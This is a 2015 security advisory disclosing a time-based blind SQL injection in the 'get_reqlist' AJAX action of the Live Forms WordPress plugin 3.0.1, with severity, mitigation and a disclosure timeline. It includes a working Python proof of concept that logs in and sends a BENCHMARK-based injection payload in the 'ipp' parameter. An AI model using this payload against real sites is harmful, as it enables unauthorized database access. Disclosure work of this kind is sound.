g0blin Research: Live Forms - Visual Form Builder 3.0.1, Blind SQL Injection

Live Forms - Visual Form Builder 3.0.1, Blind SQL Injection

The AJAX action ‘get_reqlist’ is available to all logged in users. The parameter ‘ipp’ sent to this action is vulnerable to Blind MySQL Injection. This can be leveraged by detecting how long a query takes to return.

Homepage

https://wordpress.org/plugins/liveforms/

CVSS Score

3.5

CSSS Vector

(AV:N/AC:M/Au:S/C:P/I:N/A:N)

Attack Scope

remote

Authorization Required

Registered

Mitigation

Update to version 3.2.0.

Proof of Concept

import requests
s = requests.session()
target = 'http://localhost:8000'
url = '%s/wp-login.php'%target
payload = {
        "log":"test",
        "pwd":"test",
        "wp-submit":"Log+In"
}
r = s.post(url, data=payload)

url = '%s/wp-admin/admin-ajax.php'%target
payload = {
        "action":"get_reqlist",
        "form_id":"1",
        "ipp":"1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)"
}
headers = {
        "X-Requested-With":"XMLHttpRequest"
}
r = s.post(url, data=payload, headers=headers)

Timeline

2015-02-16: Discovered
2015-03-02: Vendor notified
2015-03-09: Follow up email sent to vendor
2015-03-09: Vendor responded with intent to fix
2015-03-11: Version 3.2.0 released – issue resolved
2015-03-18: Advisory released